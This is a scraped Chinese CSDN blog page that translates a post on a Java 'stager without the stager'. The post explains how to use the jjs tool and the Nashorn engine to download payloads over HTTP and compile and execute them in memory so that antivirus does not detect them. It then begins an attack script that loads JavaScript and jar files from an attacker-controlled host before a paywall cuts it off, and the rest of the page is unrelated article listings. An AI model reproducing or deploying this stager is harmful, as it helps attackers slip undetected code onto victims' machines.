java调用服务器报警_Java传输器之无招胜有招

最新推荐文章于 2023-04-25 13:59:47 发布
最新推荐文章于 2023-04-25 13:59:47 发布
阅读量130 收藏
点赞数
文章标签: java调用服务器报警
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42421177/article/details/114716673
版权

前段时间在网上读了一篇有关java传输器的博客Java Stager without the Stager。该文讲述了利用java的jjs组件和Nashorn引擎下载并执行payload,由于该利用程序不含恶意代码因此免疫大部分杀软的查杀,又由于payload在内存中编译执行,许多实时防御系统也无法检测到。现将该文翻译如下:

最近我一直在研究java,实际上,这是本月出的第三篇博客。

博客一这篇文章里我展示了一个java传输器,用它可以下载payload,在内存中编译它并执行。

博客二 这篇文章里我介绍了利用jjs(jre环境组件,自java8引入)在安装了java的设备上做一些坏事。它通过调用Nashorn引擎以javascript语法访问java对象。

在本文中,我将综合以上两种方法通过Nashorn在“无”java传输器的情况下传送payload。

缺陷分析

我们重新分析一下传输器的目标及特性:传输器是上传到目标主机的一个执行文件或脚本。

传输器必须是正常代码以躲避杀软的粗暴分析。

传输器接着通过HTTP将实际payload下载到内存,这也是躲避杀软策略的方法。

这种“躲入内存”的方法来源于James Williams发布在油管的视频《英特网太热》(~……~)。这段视频被一家杀毒厂商以版权问题强制临时下架,这使视频一下火了。目前已有3万2千的播放量,比第二名多了3万。而第二名是一段今年BSides Manchester会议的视频。

Nashorn Payload// 将这里改为攻击者主机地址

var host = "http:///";

// 通过HTTP加载NnClassLoader

load(host + "NnClassLoader.js");

// 使用NnClassLoader下载Janino和Apache的jar包

// Obtain these Jar files and stick them in your web root

var L = new NnClassLoader({ urls: [host + 'janino-3.0.8.jar', host + 'commons-compiler-3.0.8.jar']});

var P = L.type('org.codehaus.janino.SimpleCompiler');

var SimpleCompiler = L.type("org.codehaus.janino.SimpleCompiler");

// 引入我们要用的对象

var BufferedReader = Java.type("java.io.BufferedReader");

var Input

最低0.47元/天 解锁文章
thinkAnA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中控门禁控制Java二次开发
11-28
Java中,这可能通过调用特定的API函数完成,然后将相关信息发送到控制。 5. **记录查询**:查看开门记录是门禁系统的重要功能,Java程序可以定时或按需向控制请求记录数据。数据通常包括时间、卡号、事件类型...
java获取系统硬件温度,zabbix通过IPMI监控硬件环境(温度和风扇)
weixin_30499315的博客
03-16 849
通过IPMItools达到收集数据的目的,然后通过与zabbix的结合实现数据统计和报警。1.IPMI的配置:1.1介绍IPMI(Intelligent PlatformManagement Interface)即智能平台管理接口是使硬件管理具备“智能化”的新一代通用接口标准。用户可以利用 IPMI 监视服务器的物理特征,如温度、电压、电扇工作状态、电源供应以及机箱***等。Ipmi 最大的优势在...
JAVA对接语音通知接口DEMO示例
m0_61684517的博客
10-12 493
//接口类型:互亿无线语音通知接口。 //账户注册:请通过该地址开通账户hhttp://user.ihuyi.com/?jmzFP2 //注意事项: //(1)调试期间,请仔细阅读接口文档; //(2)请使用APIID(查看APIID请登录用户中心->语音通知->帐户及签名设置->APIID)及 APIkey来调用接口; //(3)该代码仅供接入互亿无线语音通知接口参考使用,客户可根据实际需要自行编写; public class sendvoice { private stat.
Java 如何串口通信以及常见报错解决
weixin_44276313的博客
09-09 5576
Java 如何进行串口通信 Java 报错 A fatal error has been detected by the Java Runtime Environment: EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000001800 Exception in thread "main" java.lang.UnsatisfiedLinkError: no rxtxSerial in java.library.path。
Java代码中使用JavaScript
qq_53057371的博客
04-25 1898
Java代码中使用JavaScript
java病毒扫描代码,J2EE中集成赛门铁克防病毒扫描引擎[Java编程]
weixin_39646725的博客
03-22 313
赞助商链接本文“J2EE中集成赛门铁克防病毒扫描引擎[Java编程]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:赛门铁克防病毒扫描引擎是一款企业级的杀毒引擎,并可以和各种环境举行集成,目前项目中需求在J2EE的环境中利用这个技术,故公布出实现办法供人参考.为此目的专门开辟了一个jar包用于和Scan Serv...
fdfs-monitor:fdfs监视
06-30
Java的异步IO模型使得数据传输更加流畅,降低了系统开销。 fdfs-monitor-master这个文件夹名可能代表了项目源码的主分支或根目录。在这个目录下,我们可以找到项目的源代码、配置文件、构建脚本等。通常,源码会...
remote-server-management-client:远程服务器管理客户端
05-19
客户端通过RMI调用远程服务器上的方法,传递参数并接收结果。 2. **Java Socket编程**:如果RMI不被采用,Java的Socket编程可能被用来建立客户端与服务器之间的连接。Socket是网络通信的基础,它允许两台机通过...
java短信平台源代码
06-01
Java短信平台源代码是开发基于Java技术的短信发送系统的核心组成部分,主要负责处理短信的发送、接收、管理和监控等功能。这种平台通常采用CMPP(China Mobile Peer to Peer)协议,这是中国移动为SP(Service ...
服务器ftp需要staxmem.dll文件
01-12
在本案例中,"staxmem.dll"是一个动态链接库(DLL)文件,它是Java XML流处理API(StAX - Streaming API for XML)的一部分,可能被服务器上的FTP服务或与之相关的应用程序所调用。 **Staxmem.dll的作用:** 1. **...
服务器报警
11-12
这个程序是利用飞信的接口进行发送短信的一个程序,内容很简单,你可以根据自己的需要去添加自己的逻辑,然后在适当时刻发送短信进行报警
java如何实现告警_基于物联网平台物联设备管理、告警以及处理如何实现的?...
weixin_39610722的博客
12-19 1991
公司主要在做物联网相关的业务,基于物联网的业务体系归纳起来可以发现一些相同的特点,这些特点从产品的角度应该要进行归纳整理,保证后续整体业务架构复用。我们也一直希望能够归纳出一套相对完整、一致的理论体系,用于指导原有的产品和未来新开发产品;要进行一个物联应用的开发,设计,首先要搞清楚物联应用应该到底要解决那些问题。一个物联网产品有什么特点呢?针对物联设备,要先进行设备的管理。对于物联设备的数据报文进...
java调用服务器报警_Java代码调用服务器上的Shell脚本
weixin_39555579的博客
02-26 186
Java代码调用服务器上的Shell脚本这里主要是因为我们报表平台有用到用户手工录入的数据作为结果数据且需要纳入saiku去展示如我们所知,saiku不会自动刷新,所以需要在数据更新接口中调用服务器上的shell脚本话不多说,上代码: (直接使用Eclipse, run Java Application ,执行成功后脚本中的输出内容会打印到控制台)package saikuDemo1;impor...
JJS(jdk提供通过js调用Java)
weixin_40445305的博客
04-15 4633
小工具笔记
java代码控制电脑发出警报_java – 如何使用警报构建对话框显示消息
weixin_39753674的博客
02-25 273
我想使用一个对话框来显示下面方法中包含的消息,而不仅仅是setText,但每次使用alertBuilder时,都不会显示消息.有人可以指点我正确的方向吗?以下是代码:@Overridepublic void onPreviewFrame(byte[] data, Camera cam) {if (data == null) throw new NullPointerException();Came...
服务器中病毒清理
qq_34874784的博客
10-12 147
查看脚本进程号 top c 可以查到不正常的经常为 1040853 根据进程号检查脚本是否有守护进程,有守护进程的话记录守护进程号 systemctlstatus1966 找到守护进程号 1151445 1934783 删除脚本守护进程,删除关联文件位置 kill-91000959 kill-91373036 rm-rf/tmp/X11-unix/ 清除脚本并find查找下其他位置是否也存在脚本(注意文件路径) find/-namesystemd-...
如何用java写个病毒查杀软件
Coolyqq的专栏
08-14 5599
如何用java写个病毒查杀软件: 题目:在某个目录下,比如有个1.txt的文件(它是隐藏的,且扩展名也是隐藏的),而正好有个可执行文件名为1.txt.exe(自己故意做这样的文件),在你的电脑上显示的是1.txt(扩展名是隐藏的),你一不小心就点击它了,现在下面这个小java软件可以删点1.txt.exe 思路;用的是连个集合,一个装所以的文件,一个装隐藏文件,然后两个容对比。 也许有更简单的
java异常涉及到的关键字_Java异常机制都用到了哪些关键字
weixin_35914648的博客
02-28 663
前言:在Java程序中,所有异常对象的根基类是Throwable,Throwable从Object直接继承而来(这是Java系统所强制要求的)。Throwable有两个重要的子类:Exception(异常)和 Error(错误),二者都是 Java 异常处理的重要子类,各自都包含大量子类。Error(错误)是程序无法处理的错误,表示运行应用程序中较严重问题。大多数错误与代码编写者执行的操作无关,而...
java调用win32_java调用win32api操作windows窗口
最新发布
06-09
Java不能直接调用Win32 API,因为Java虚拟机并不了解Win32 API的内部实现,而且Java虚拟机是跨平台的,无法直接调用底层操作系统的API。 为了解决这个问题,我们需要使用JNI(Java Native Interface)技术,通过JNI...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值